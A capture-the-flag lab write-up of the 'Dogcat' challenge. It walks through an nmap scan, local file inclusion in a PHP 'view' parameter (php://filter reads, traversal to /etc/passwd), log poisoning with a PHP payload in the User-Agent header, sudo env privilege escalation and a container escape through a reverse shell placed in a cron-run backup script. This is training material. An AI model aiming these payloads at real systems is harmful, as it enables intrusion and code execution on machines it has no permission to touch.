search

Dogcat

I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.

hashtag
Scanning

hashtag
Nmap

root@ip-10-10-97-164:~# nmap -F 10.10.20.102
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-24 19:49 BST
Nmap scan report for ip-10-10-20-102.eu-west-1.compute.internal (10.10.20.102)
Host is up (0.0082s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:6B:D4:2B:DC:C9 (Unknown)
​
Nmap done: 1 IP address (1 host up) scanned in 1.91 seconds
​
root@ip-10-10-97-164:~# nmap -sV -O 10.10.20.102
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-24 20:01 BST
Nmap scan report for ip-10-10-20-102.eu-west-1.compute.internal (10.10.20.102)
Host is up (0.00051s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 02:6B:D4:2B:DC:C9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=9/24%OT=22%CT=1%CU=42340%PV=Y%DS=1%DC=D%G=Y%M=026BD4%T
OS:M=614E20BB%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
​
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds
​

apache2-debian

hashtag
Enumeration

hashtag
Port 80

after some enum i find this parameter "view"

i tried path traversal but throw back error

lets try php-wrapper filter "bypass required"

http://10.10.20.102/?view=php://filter/convert.base64-encode/resource=cat/../index

LFI vulnerability "local file inclusion"

this encoded output is index.php

index.php

to avoid extension check we can set is as empty in get request &ext

lets try access /etc/passwd

add ext var with empty value

http://10.10.20.102/?view=cat/../../../../etc/passwd&ext

hashtag
Initial Access

hashtag
LFI to RCE

google for where is logs for apache2-debian

http://10.10.20.102?view=cat/../../../../var/log/apache2/access.log&ext

lets try to run php code in user agent header

curl http://10.10.20.102/?view=cat -A "<?php echo('hi')"?>"

php code executed ...

i tried to include bash reverse shell in same way ... not working

lets try to include shell file

setup http server in shellarrow-up-right directory

send the request with "payload"

set up listener

hashtag
first flag:

hashtag
What is flag 2?

Still using our reverse shell:

hashtag
Privilege Escalation

check if account has sudo privilege

https://gtfobins.github.io/gtfobins/env/arrow-up-right, we see that we can take advantage of this to run a privileged shell with sudo /usr/bin/env /bin/bash:

hashtag
3rd flag

hashtag
Are we inside a container?

Still in our reverse shell, running the hostname command outputs 28e9b7daee8b, which might be an indication that we are running inside a container.

Listing the different directories at the root of the system reveals that /opt/ contains backups:

Here is the content of the script:

Also refreshing the ls -l command reveals that the backup.tar archive is saved every minute.

hashtag
Escaping the container

Let’s take advantage of that to modify the script and create a reverse shell to the main server and hence, escape the container.

Let’s go to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetarrow-up-right and get a bash reverse shell:

OK, let’s transform the backup script into a reverse shell:

And open a listener on our machine:

The output from the reverse shell:

PreviousDaily BugleNextAnonymous

Last updated